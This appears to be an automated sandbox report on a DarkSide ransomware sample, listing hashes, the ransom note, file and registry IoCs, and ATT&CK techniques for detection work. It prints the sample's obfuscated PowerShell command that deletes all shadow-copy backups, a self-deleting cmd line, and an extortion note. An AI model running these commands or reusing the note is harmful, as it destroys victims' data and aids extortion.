darkside | 2c1e20a4b38634b97de398246bc3c8082d47663702a46bb885dc7fcc5f71daa1

General

Target

2c1e20a4b38634b97de398246bc3c8082d47663702a46bb885dc7fcc5f71daa1.exe
Size

59KB
MD5

6957d10b51d89a2a52eede8b7c3b8472
SHA1

80071ebdbfbe962a124f54495b7e6082f2cb6051
SHA256

2c1e20a4b38634b97de398246bc3c8082d47663702a46bb885dc7fcc5f71daa1
SHA512

c1b3680ff3d6d312ecb71bb421ccab6f4aea04e267db6dbe35a46b9a57980092005922066fdb7d1bb7b2e376bde706caa77a56553cdaea64f96b6c4997d1b018

Score

10^/10

darkside ransomware spyware stealer

Malware Config

Extracted

Path

C:\\README.5bede5a3.TXT

Family

darkside

Ransom Note

----------- [ Welcome to DarkSide ] -------------> What happend? ---------------------------------------------- Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. Follow our instructions below and you will recover all your data. What guarantees? ---------------------------------------------- We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. We guarantee to decrypt one file for free. Go to the site and contact us. How to get access on website? ---------------------------------------------- Using a TOR browser: 1) Download and install TOR browser from this site: https://torproject.org/ 2) Open our website: http://darksidfqzcuhtk2.onion/CZEX8E0GR0AO4ASUCJE1K824OKJA1G24B8B3G0P84LJTTE7W8EC86JBE7NBXLMRT When you open our website, put the following data in the input form: Key: 0kZdK3HQhsAkUtvRl41QkOdpJvzcWnCrBjjgg5U4zfuWeTnZR5Ssjd3QLHpmbjxjo7uWzKbt8qPVuYN38TsDPI3bemd5I40ksemIzuI5OhIHZsi9cn3Wpd7OUT72FP9MyAUzR586yMsI2Ygri9in0Bf4EkG0pmBOLyRG1T788foGJQW1WxS1Qd2sMVvX0jKlbGG1zLp7g0u6buDCzSMyTjWjuVzJYufBBv7S2XvciEVvboiTNbZA4UUU6PttKERQSb018aILd6xO3ulk6fbEgZDO5tZSGn2zRevn5YXnHtg6vt1ToLe3izQOgYbs8Ja1fkfJBUYVux1ITyWBjpn0xPayKfwln8SqgMkbqiDyxEDEtFhqiffLcONMhi4TmW50loZIC6mWSaOjThWp6XSJUWPtY8Mkzs8Cs0qjPahx58iAEVIRGUVpLkMs7xPN7ydZ6wMWaOcRC1AD1JEUVTjLikXXyckgYaS6FnEv0UNEsv6QbTLSpDomIg3rEYZBib6ozrwH5n0M5wrKo8NciUBmfJWDP4XKkjznpsa05rEpuAklM0dMmZsYGVR !!! DANGER !!! DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. !!! DANGER !!!

URLs

http://darksidfqzcuhtk2.onion/CZEX8E0GR0AO4ASUCJE1K824OKJA1G24B8B3G0P84LJTTE7W8EC86JBE7NBXLMRT

Signatures

DarkSide
Targeted ransomware first seen in August 2020. Operators steal data to use as leverage.
ransomware darkside

Modifies extensions of user files 10 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

Processes:

2c1e20a4b38634b97de398246bc3c8082d47663702a46bb885dc7fcc5f71daa1.exe

description	ioc	process
File opened for modification	C:\Users\Admin\Pictures\DenyMerge.png.5bede5a3	2c1e20a4b38634b97de398246bc3c8082d47663702a46bb885dc7fcc5f71daa1.exe
File opened for modification	C:\Users\Admin\Pictures\EnterCheckpoint.raw.5bede5a3	2c1e20a4b38634b97de398246bc3c8082d47663702a46bb885dc7fcc5f71daa1.exe
File renamed	C:\Users\Admin\Pictures\NewRename.raw => C:\Users\Admin\Pictures\NewRename.raw.5bede5a3	2c1e20a4b38634b97de398246bc3c8082d47663702a46bb885dc7fcc5f71daa1.exe
File opened for modification	C:\Users\Admin\Pictures\RequestExport.tif.5bede5a3	2c1e20a4b38634b97de398246bc3c8082d47663702a46bb885dc7fcc5f71daa1.exe
File renamed	C:\Users\Admin\Pictures\UnblockConvertFrom.tif => C:\Users\Admin\Pictures\UnblockConvertFrom.tif.5bede5a3	2c1e20a4b38634b97de398246bc3c8082d47663702a46bb885dc7fcc5f71daa1.exe
File renamed	C:\Users\Admin\Pictures\DenyMerge.png => C:\Users\Admin\Pictures\DenyMerge.png.5bede5a3	2c1e20a4b38634b97de398246bc3c8082d47663702a46bb885dc7fcc5f71daa1.exe
File opened for modification	C:\Users\Admin\Pictures\NewRename.raw.5bede5a3	2c1e20a4b38634b97de398246bc3c8082d47663702a46bb885dc7fcc5f71daa1.exe
File renamed	C:\Users\Admin\Pictures\RequestExport.tif => C:\Users\Admin\Pictures\RequestExport.tif.5bede5a3	2c1e20a4b38634b97de398246bc3c8082d47663702a46bb885dc7fcc5f71daa1.exe
File opened for modification	C:\Users\Admin\Pictures\UnblockConvertFrom.tif.5bede5a3	2c1e20a4b38634b97de398246bc3c8082d47663702a46bb885dc7fcc5f71daa1.exe
File renamed	C:\Users\Admin\Pictures\EnterCheckpoint.raw => C:\Users\Admin\Pictures\EnterCheckpoint.raw.5bede5a3	2c1e20a4b38634b97de398246bc3c8082d47663702a46bb885dc7fcc5f71daa1.exe

Deletes itself 1 IoCs

Processes:

cmd.exe

pid process

3200 cmd.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

pid	process
3200	cmd.exe

Sets desktop wallpaper using registry 2 TTPs 2 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

Processes:

2c1e20a4b38634b97de398246bc3c8082d47663702a46bb885dc7fcc5f71daa1.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Control Panel\Desktop\WallPaper = "C:\\ProgramData\\5bede5a3.BMP"	2c1e20a4b38634b97de398246bc3c8082d47663702a46bb885dc7fcc5f71daa1.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\5bede5a3.BMP"	2c1e20a4b38634b97de398246bc3c8082d47663702a46bb885dc7fcc5f71daa1.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Modifies Control Panel 1 IoCs

evasion

Processes:

2c1e20a4b38634b97de398246bc3c8082d47663702a46bb885dc7fcc5f71daa1.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Control Panel\Desktop\WallpaperStyle = "10"	2c1e20a4b38634b97de398246bc3c8082d47663702a46bb885dc7fcc5f71daa1.exe

Modifies registry class 5 IoCs

Processes:

2c1e20a4b38634b97de398246bc3c8082d47663702a46bb885dc7fcc5f71daa1.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.5bede5a3	2c1e20a4b38634b97de398246bc3c8082d47663702a46bb885dc7fcc5f71daa1.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.5bede5a3\ = "5bede5a3"	2c1e20a4b38634b97de398246bc3c8082d47663702a46bb885dc7fcc5f71daa1.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\5bede5a3\DefaultIcon	2c1e20a4b38634b97de398246bc3c8082d47663702a46bb885dc7fcc5f71daa1.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\5bede5a3	2c1e20a4b38634b97de398246bc3c8082d47663702a46bb885dc7fcc5f71daa1.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\5bede5a3\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\5bede5a3.ico"	2c1e20a4b38634b97de398246bc3c8082d47663702a46bb885dc7fcc5f71daa1.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

Processes:

powershell.exe2c1e20a4b38634b97de398246bc3c8082d47663702a46bb885dc7fcc5f71daa1.exe

pid	process
1532	powershell.exe
316	2c1e20a4b38634b97de398246bc3c8082d47663702a46bb885dc7fcc5f71daa1.exe
316	2c1e20a4b38634b97de398246bc3c8082d47663702a46bb885dc7fcc5f71daa1.exe

Suspicious use of AdjustPrivilegeToken 24 IoCs

Processes:

2c1e20a4b38634b97de398246bc3c8082d47663702a46bb885dc7fcc5f71daa1.exepowershell.exevssvc.exe

description	pid	process
Token: SeIncreaseQuotaPrivilege	316	2c1e20a4b38634b97de398246bc3c8082d47663702a46bb885dc7fcc5f71daa1.exe
Token: SeSecurityPrivilege	316	2c1e20a4b38634b97de398246bc3c8082d47663702a46bb885dc7fcc5f71daa1.exe
Token: SeTakeOwnershipPrivilege	316	2c1e20a4b38634b97de398246bc3c8082d47663702a46bb885dc7fcc5f71daa1.exe
Token: SeLoadDriverPrivilege	316	2c1e20a4b38634b97de398246bc3c8082d47663702a46bb885dc7fcc5f71daa1.exe
Token: SeSystemProfilePrivilege	316	2c1e20a4b38634b97de398246bc3c8082d47663702a46bb885dc7fcc5f71daa1.exe
Token: SeSystemtimePrivilege	316	2c1e20a4b38634b97de398246bc3c8082d47663702a46bb885dc7fcc5f71daa1.exe
Token: SeProfSingleProcessPrivilege	316	2c1e20a4b38634b97de398246bc3c8082d47663702a46bb885dc7fcc5f71daa1.exe
Token: SeIncBasePriorityPrivilege	316	2c1e20a4b38634b97de398246bc3c8082d47663702a46bb885dc7fcc5f71daa1.exe
Token: SeCreatePagefilePrivilege	316	2c1e20a4b38634b97de398246bc3c8082d47663702a46bb885dc7fcc5f71daa1.exe
Token: SeBackupPrivilege	316	2c1e20a4b38634b97de398246bc3c8082d47663702a46bb885dc7fcc5f71daa1.exe
Token: SeRestorePrivilege	316	2c1e20a4b38634b97de398246bc3c8082d47663702a46bb885dc7fcc5f71daa1.exe
Token: SeShutdownPrivilege	316	2c1e20a4b38634b97de398246bc3c8082d47663702a46bb885dc7fcc5f71daa1.exe
Token: SeDebugPrivilege	316	2c1e20a4b38634b97de398246bc3c8082d47663702a46bb885dc7fcc5f71daa1.exe
Token: SeSystemEnvironmentPrivilege	316	2c1e20a4b38634b97de398246bc3c8082d47663702a46bb885dc7fcc5f71daa1.exe
Token: SeRemoteShutdownPrivilege	316	2c1e20a4b38634b97de398246bc3c8082d47663702a46bb885dc7fcc5f71daa1.exe
Token: SeUndockPrivilege	316	2c1e20a4b38634b97de398246bc3c8082d47663702a46bb885dc7fcc5f71daa1.exe
Token: SeManageVolumePrivilege	316	2c1e20a4b38634b97de398246bc3c8082d47663702a46bb885dc7fcc5f71daa1.exe
Token: 33	316	2c1e20a4b38634b97de398246bc3c8082d47663702a46bb885dc7fcc5f71daa1.exe
Token: 34	316	2c1e20a4b38634b97de398246bc3c8082d47663702a46bb885dc7fcc5f71daa1.exe
Token: 35	316	2c1e20a4b38634b97de398246bc3c8082d47663702a46bb885dc7fcc5f71daa1.exe
Token: SeDebugPrivilege	1532	powershell.exe
Token: SeBackupPrivilege	572	vssvc.exe
Token: SeRestorePrivilege	572	vssvc.exe
Token: SeAuditPrivilege	572	vssvc.exe

Suspicious use of WriteProcessMemory 8 IoCs

Processes:

2c1e20a4b38634b97de398246bc3c8082d47663702a46bb885dc7fcc5f71daa1.exe

description	pid	process	target process
PID 316 wrote to memory of 1532	316	2c1e20a4b38634b97de398246bc3c8082d47663702a46bb885dc7fcc5f71daa1.exe	powershell.exe
PID 316 wrote to memory of 1532	316	2c1e20a4b38634b97de398246bc3c8082d47663702a46bb885dc7fcc5f71daa1.exe	powershell.exe
PID 316 wrote to memory of 1532	316	2c1e20a4b38634b97de398246bc3c8082d47663702a46bb885dc7fcc5f71daa1.exe	powershell.exe
PID 316 wrote to memory of 1532	316	2c1e20a4b38634b97de398246bc3c8082d47663702a46bb885dc7fcc5f71daa1.exe	powershell.exe
PID 316 wrote to memory of 3200	316	2c1e20a4b38634b97de398246bc3c8082d47663702a46bb885dc7fcc5f71daa1.exe	cmd.exe
PID 316 wrote to memory of 3200	316	2c1e20a4b38634b97de398246bc3c8082d47663702a46bb885dc7fcc5f71daa1.exe	cmd.exe
PID 316 wrote to memory of 3200	316	2c1e20a4b38634b97de398246bc3c8082d47663702a46bb885dc7fcc5f71daa1.exe	cmd.exe
PID 316 wrote to memory of 3200	316	2c1e20a4b38634b97de398246bc3c8082d47663702a46bb885dc7fcc5f71daa1.exe	cmd.exe

C:\Users\Admin\AppData\Local\Temp\2c1e20a4b38634b97de398246bc3c8082d47663702a46bb885dc7fcc5f71daa1.exe
"C:\Users\Admin\AppData\Local\Temp\2c1e20a4b38634b97de398246bc3c8082d47663702a46bb885dc7fcc5f71daa1.exe"
1⤵
- Modifies extensions of user files
- Sets desktop wallpaper using registry
- Modifies Control Panel
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:316

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1532

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C DEL /F /Q C:\Users\Admin\AppData\Local\Temp\2C1E20~1.EXE >> NUL
2⤵
- Deletes itself
PID:3200

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:572

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Credentials in Files

1

T1081

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Data from Local System

1

T1005

Exfiltration

Command and Control

Impact

Defacement

1

T1491

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5
839f3cef3f2705f6e257cd95a7d5466d

SHA1
9acbed79d18991aecfad64b29256868f8da3a3a3

SHA256
c9c50db1750f01fd7fc6150daee5581b9e4022e1bc4ab954f14bd91f98d3ec4e

SHA512
1cab98077fc2f2d8d6ac1edf7ec422e5077cd877bd8185490df3eccc5f96becca7f8a4af0c07d3ff69c7ef1b317338acf2fc7e0c70211f2cc055d47dd1ca841c

Download Submit
memory/316-54-0x0000000076001000-0x0000000076003000-memory.dmp

Filesize
8KB

Download
memory/1532-55-0x000007FEFC441000-0x000007FEFC443000-memory.dmp

Filesize
8KB

Download
memory/1532-57-0x0000000002660000-0x0000000002662000-memory.dmp

Filesize
8KB

Download
memory/1532-58-0x0000000002662000-0x0000000002664000-memory.dmp

Filesize
8KB

Download
memory/1532-59-0x0000000002664000-0x0000000002667000-memory.dmp

Filesize
12KB

Download
memory/1532-56-0x000007FEF2B00000-0x000007FEF365D000-memory.dmp

Filesize
11.4MB

Download
memory/1532-60-0x000000000266B000-0x000000000268A000-memory.dmp

Filesize
124KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads